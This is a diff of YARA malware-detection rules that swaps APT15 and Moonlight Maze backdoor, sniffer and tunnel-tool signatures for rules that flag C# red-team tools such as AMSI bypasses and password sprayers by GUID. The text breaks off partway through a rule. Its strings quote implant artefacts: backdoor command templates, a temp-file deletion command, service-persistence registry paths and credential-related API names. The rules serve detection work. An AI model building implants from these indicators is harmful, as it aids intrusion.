 
 	strings:
-		$s1 = "\\Release\\EWSTEW.pdb" ascii
-		$s2 = "EWSTEW.exe" fullword wide
-		$s3 = "Microsoft.Exchange.WebServices.Data" fullword ascii
-		$s4 = "tmp.dat" fullword wide
-		$s6 = "/v or /t is null" fullword wide
+		$typelibguid0lo = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii wide
+		$typelibguid0up = "36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Clean_Apt15_Patchedcmd : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpamsibypass : FILE
 {
 	meta:
-		description = "This is a patched CMD. This is the CMD that RoyalCli uses."
-		author = "Ahmed Zaki"
-		id = "c6867ad4-f7f2-5d63-bffd-07599ede635d"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L118-L131"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ca97004e-edc1-5b5a-ac67-e81ae24631aa"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/WayneJLee/CsharpAmsiBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L858-L872"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
-		logic_hash = "08a68e14793d2f44ee75e49a43521c7d8bc1fc5ddd005e1fb71cc844966e16ba"
+		logic_hash = "c422c6b2dc54f5d62a4e5e85da4add5d0bf4eb5107f6778a45835649581a5517"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "eisableCMD" wide
-		$ = "%WINDOWS_COPYRIGHT%" wide
-		$ = "Cmd.Exe" wide
-		$ = "Windows Command Processor" wide
+		$typelibguid0lo = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii wide
+		$typelibguid0up = "4AB3B95D-373C-4197-8EE3-FE0FA66CA122" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Malware_Apt15_Royalcli_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hastyseries : FILE
 {
 	meta:
-		description = "Generic strings found in the Royal CLI tool"
-		author = "David Cannings"
-		id = "432c09bf-3c44-5a2c-ba69-7b4fe7eb43cc"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L133-L152"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0d35acf4-c763-593c-94e2-c499d3826375"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/obscuritylabs/HastySeries"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L874-L906"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
-		logic_hash = "3cc0cd81db58e20fbf31fbd9fe65d113b7160e7d2b6739c01987d9e317099b9b"
+		logic_hash = "79bbcc46c8a327b6d0aec61ceb8516a097f02ac71e692d22f1893a529a011f44"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "%s~clitemp%08x.tmp" fullword
-		$ = "%s /c %s>%s" fullword
-		$ = "%snewcmd.exe" fullword
-		$ = "%shkcmd.exe" fullword
-		$ = "%s~clitemp%08x.ini" fullword
-		$ = "myRObject" fullword
-		$ = "myWObject" fullword
-		$ = "2 %s  %d 0 %d\x0D\x0A"
-		$ = "2 %s  %d 1 %d\x0D\x0A"
-		$ = "%s file not exist" fullword
+		$typelibguid0lo = "8435531d-675c-4270-85bf-60db7653bcf6" ascii wide
+		$typelibguid0up = "8435531D-675C-4270-85BF-60DB7653BCF6" ascii wide
+		$typelibguid1lo = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii wide
+		$typelibguid1up = "47DB989F-7E33-4E6B-A4A5-C392B429264B" ascii wide
+		$typelibguid2lo = "300c7489-a05f-4035-8826-261fa449dd96" ascii wide
+		$typelibguid2up = "300C7489-A05F-4035-8826-261FA449DD96" ascii wide
+		$typelibguid3lo = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii wide
+		$typelibguid3up = "41BF8781-AE04-4D80-B38D-707584BF796B" ascii wide
+		$typelibguid4lo = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii wide
+		$typelibguid4up = "620ED459-18DE-4359-BFB0-6D0C4841B6F6" ascii wide
+		$typelibguid5lo = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii wide
+		$typelibguid5up = "91E7CDFE-0945-45A7-9EAA-0933AFE381F2" ascii wide
+		$typelibguid6lo = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii wide
+		$typelibguid6up = "C28E121A-60CA-4C21-AF4B-93EB237B882F" ascii wide
+		$typelibguid7lo = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii wide
+		$typelibguid7up = "698FAC7A-BFF1-4C24-B2C3-173A6AAE15BF" ascii wide
+		$typelibguid8lo = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii wide
+		$typelibguid8up = "63A40D94-5318-42AD-A573-E3A1C1284C57" ascii wide
+		$typelibguid9lo = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" ascii wide
+		$typelibguid9up = "56B8311B-04B8-4E57-BB58-D62ADC0D2E68" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Malware_Apt15_Royalcli_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dreamprotectorfree : FILE
 {
 	meta:
-		description = "APT15 RoyalCli backdoor"
-		author = "Nikolaos Pantazopoulos"
-		id = "d4acfd2d-385d-5063-898e-d339b50733eb"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L154-L167"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9ebee989-3441-5a76-b243-08de978b541c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/Paskowsky/DreamProtectorFree"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L908-L922"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c57ae92ba84355652cd56c8eaad3f277a8f514f8d078f053f3e8208b8bec535f"
+		logic_hash = "04c6daa23bbca852f83853e717c81622130beb3ac2551f8c3e23d2ec75aa0376"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = "%shkcmd.exe" fullword
-		$string2 = "myRObject" fullword
-		$string3 = "%snewcmd.exe" fullword
-		$string4 = "%s~clitemp%08x.tmp" fullword
-		$string6 = "myWObject" fullword
+		$typelibguid0lo = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii wide
+		$typelibguid0up = "F7E8A902-2378-426A-BFA5-6B14C4B40AA3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Malware_Apt15_Royaldll
+rule SIGNATURE_BASE_HKTL_NET_GUID_Redsharp : FILE
 {
 	meta:
-		description = "DLL implant, originally rights.dll and runs as a service"
-		author = "David Cannings"
-		id = "26baef92-1055-56dc-b274-e2a6bc05d85b"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L196-L243"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2aa62d61-075c-5664-a7fc-2b9d84b954ed"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/padovah4ck/RedSharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L924-L938"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
-		logic_hash = "2ed0d38993a072da189f02233bd7cc0bf1be02e926f687db224f52de9b3a44fc"
+		logic_hash = "b611422c3bd8d3ed713cbeabadef0402dfdee42e8bbe563b054dc582945d8519"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }
-		$opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }
-		$opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 }
-		$ = "Nwsapagent" fullword
-		$ = "\"%s\">>\"%s\"\\s.txt"
-		$ = "myWObject" fullword
-		$ = "del c:\\windows\\temp\\r.exe /f /q"
-		$ = "del c:\\windows\\temp\\r.ini /f /q"
+		$typelibguid0lo = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii wide
+		$typelibguid0up = "30B2E0CF-34DD-4614-A5CA-6578FB684AEA" ascii wide
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_Malware_Apt15_Royaldll_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_ESC : FILE
 {
 	meta:
-		description = "DNS backdoor used by APT15"
-		author = "Ahmed Zaki"
-		id = "3bc546a5-38b9-5504-b09e-305ba7bbd6bc"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L245-L261"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a57c47e8-62bf-5425-9735-35a3e3a0c218"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NetSPI/ESC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L940-L956"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
-		logic_hash = "94e2b61ff19b1377f461203cb22c607e718683691e54a3de3ed32bf6ed2897fa"
+		logic_hash = "ff959136f219b082dd9b601dbf2fea41265ce08a4cf57e368b2b4ac1f09ea698"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii
-		$ = "netsvcs" wide ascii fullword
-		$ = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword
-		$ = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
-		$ = "myWObject" wide ascii
+		$typelibguid0lo = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii wide
+		$typelibguid0up = "06260CE5-61F4-4B81-AD83-7D01C3B37921" ascii wide
+		$typelibguid1lo = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii wide
+		$typelibguid1up = "87FC7EDE-4DAE-4F00-AC77-9C40803E8248" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and pe.exports ( "ServiceMain" ) and filesize > 50KB and filesize < 600KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Malware_Apt15_Exchange_Tool : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Csharp_Loader : FILE
 {
 	meta:
-		description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
-		author = "Ahmed Zaki"
-		id = "f07b9537-0741-51c8-a9fa-836430fe4855"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L263-L283"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bf0c3d93-cbea-54c7-b950-fd4e5a600d07"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Csharp-Loader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L958-L972"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d21a7e349e796064ce10f2f6ede31c71"
-		logic_hash = "e7b5ac97f3dcf125e64001be53aca73ee19c1be8b192a762f231106c47f76867"
+		logic_hash = "ff65463c10a7f4940f4dedef42707fe7feacded52d75014245e1961d1c80e845"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "subjectname" fullword
-		$s2 = "sendername" fullword
-		$s3 = "WebCredentials" fullword
-		$s4 = "ExchangeVersion" fullword
-		$s5 = "ExchangeCredentials" fullword
-		$s6 = "slfilename" fullword
-		$s7 = "EnumMail" fullword
-		$s8 = "EnumFolder" fullword
-		$s9 = "set_Credentials" fullword
-		$s18 = "/v or /t is null" wide
-		$s24 = "2013sp1" wide
+		$typelibguid0lo = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii wide
+		$typelibguid0up = "5FD7F9FC-0618-4DDE-A6A0-9FAEFE96C8A1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Malware_Apt15_Generic
+rule SIGNATURE_BASE_HKTL_NET_GUID_Bantam : FILE
 {
 	meta:
-		description = "Find generic data potentially relating to AP15 tools"
-		author = "David Cannings"
-		id = "4eb50731-22df-5f7a-bf5f-166ef84cf8b5"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L285-L307"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0ed3f5e5-d954-51e2-b7fb-4c25ca3d9f10"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/gellin/bantam"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L974-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e939a5ab4a4b2b289d5809e18dd57dd85e3da19a176719adba4707dfd605fc81"
+		logic_hash = "a1d0749746dc3a109b592165616f829d01cfb4be8e16137548be8a85c40d6eb7"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str01 = "myWObject" fullword
-		$str02 = "myRObject" fullword
-		$opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
+		$typelibguid0lo = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii wide
+		$typelibguid0up = "14C79BDA-2CE6-424D-BD49-4F8D68630B7B" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customlokitools : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptask : FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
-		author = "Kaspersky Lab"
-		id = "d5795d3b-bbb1-59e9-b86d-666b5c911f3b"
-		date = "2017-03-15"
-		modified = "2017-03-22"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L11-L47"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2cdd1a15-c70c-5eea-b5a7-8b4a445b9323"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/jnqpblc/SharpTask"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L990-L1004"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "14cce7e641d308c3a177a8abb5457019"
-		hash = "a3164d2bbc45fb1eef5fde7eb8b245ea"
-		hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
-		hash = "1980958afffb6a9d5a6c73fc1e2795c2"
-		hash = "e59f92aadb6505f29a9f368ab803082e"
-		logic_hash = "4e1f60b045c10758354f110c3778b8ffd7f10b5e229b3f2f821287476620bec9"
+		logic_hash = "8c6fae49accf763101ce0afc6c1ffd07740fbc68105f99059fac4f7ba0c8846c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Write file Ok..." ascii wide
-		$a2 = "ERROR: Can not open socket...." ascii wide
-		$a3 = "Error in parametrs:" ascii wide
-		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
-		$a5 = "ERROR: Not connect..." ascii wide
-		$a6 = "Connect successful...." ascii wide
-		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
-		$a8 = "clnt <%d> rqstd swap" ascii wide
-		$a9 = "cld nt sgnl prcs grp" ascii wide
-		$a10 = "cld nt sgnl prnt" ascii wide
-		$a11 = "ork error" ascii fullword
+		$typelibguid0lo = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii wide
+		$typelibguid0up = "13E90A4D-BF7A-4D5A-9979-8B113E3166BE" ascii wide
 
 	condition:
-		filesize < 5000KB and 3 of ( $a* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Customsniffer
+rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsplague : FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze sniffer tools"
-		author = "Kaspersky Lab"
-		id = "8cc76e4d-a956-543c-81e0-827dfdb5da1c"
-		date = "2017-03-15"
-		modified = "2023-12-05"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L50-L79"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "89729c43-ae01-5c1f-af04-06d7a6c4e7fc"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/RITRedteam/WindowsPlague"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1006-L1020"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7b86f40e861705d59f5206c482e1f2a5"
-		hash = "927426b558888ad680829bd34b0ad0e7"
-		logic_hash = "5ccf9035adc16393db4b3d461f7a20f86f538275d7806280a15508c15d9c805c"
+		logic_hash = "3c8ce2b52a4ebab5b9693d957c43cf1c340160f4bdd05d3cb95af496e7168d83"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.1"
-		original_filename = "ora;tdn"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "/var/tmp/gogo" fullword
-		$a2 = "myfilename= |%s|" fullword
-		$a3 = "mypid,mygid=" fullword
-		$a4 = "mypid=|%d| mygid=|%d|" fullword
-		$a5 = "/var/tmp/task" fullword
-		$a6 = "mydevname= |%s|" fullword
+		$typelibguid0lo = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii wide
+		$typelibguid0up = "CDF8B024-70C9-413A-ADE3-846A43845E99" ascii wide
 
 	condition:
-		2 of ( $a* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Loki2Crypto
+rule SIGNATURE_BASE_HKTL_NET_GUID_Misc_Csharp : FILE
 {
 	meta:
-		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
-		author = "Costin Raiu, Kaspersky Lab"
-		id = "d67288f8-5205-5882-8dff-041d092eea4f"
-		date = "2017-03-21"
-		modified = "2023-12-05"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L82-L106"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d25fa706-2254-5a82-a961-f57a0daa447c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/jnqpblc/Misc-CSharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1022-L1038"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "19fbd8cbfb12482e8020a887d6427315"
-		hash = "ea06b213d5924de65407e8931b1e4326"
-		hash = "14ecd5e6fc8e501037b54ca263896a11"
-		hash = "e079ec947d3d4dacb21e993b760a65dc"
-		hash = "edf900cebb70c6d1fcab0234062bfc28"
-		logic_hash = "c2315dafb0ecb9e6babd526a028835f3513218c1e667c81088c49ad13dbab5be"
+		logic_hash = "446cf6773e679b18da31f63b52cdc6918e77ce5496848864c973ca5af60cdb05"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
+		$typelibguid0lo = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii wide
+		$typelibguid0up = "D1421BA3-C60B-42A0-98F9-92BA4E653F3D" ascii wide
+		$typelibguid1lo = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii wide
+		$typelibguid1up = "2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1" ascii wide
 
 	condition:
-		( any of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_De_Tool
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpspray : FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool"
-		author = "Kaspersky Lab"
-		id = "09bfebca-7cec-5514-9f48-c0c2c57efcf9"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L111-L137"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e9312c96-be10-5942-a4da-1fe708cc6699"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/jnqpblc/SharpSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1040-L1054"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4bc7ed168fb78f0dc688ee2be20c9703"
-		hash = "8b56e8552a74133da4bc5939b5f74243"
-		logic_hash = "f658e1aa2ddb84fe3c1de7c7c00f2148d232cf2b3381c298420abfc382c02986"
+		logic_hash = "d2b757ccfaa924764b3c1869908e730022641e5c78919226370e84e84d6546ae"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Vnuk: %d" ascii fullword
-		$a2 = "Syn: %d" ascii fullword
-		$a3 = {25 73 0A 25 73 0A 25 73 0A 25 73 0A}
+		$typelibguid0lo = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii wide
+		$typelibguid0up = "51C6E016-1428-441D-82E9-BB0EB599BBC8" ascii wide
 
 	condition:
-		(( 2 of ( $a* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Apt_RU_Moonlightmaze_Cle_Tool
+rule SIGNATURE_BASE_HKTL_NET_GUID_Obfuscator : FILE
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
-		author = "Kaspersky Lab"
-		id = "99ae07b9-eb42-53dc-bd8b-75ab6a0b8cab"
-		date = "2017-03-27"
-		modified = "2017-03-27"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_moonlightmaze.yar#L140-L167"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d9988b00-1f10-5421-8ffe-49849a5d5902"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/3xpl01tc0d3r/Obfuscator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1056-L1070"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "647d7b711f7b4434145ea30d0ef207b0"
-		logic_hash = "a4bbd7be617b944a656fa58ca9ec6384f624c95250de6b8a6ba63e7c3387484c"
+		logic_hash = "e56ec4a13dedbf987bf6f8ee1a8dcce31b82348053d541d836086a9923f3b934"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "./a filename template_file" ascii wide
-		$a2 = "May be %s is empty?" ascii wide
-		$a3 = "template string = |%s|" ascii wide
-		$a4 = "No blocks !!!"
-		$a5 = "No data in this block !!!!!!" ascii wide
-		$a6 = "No good line"
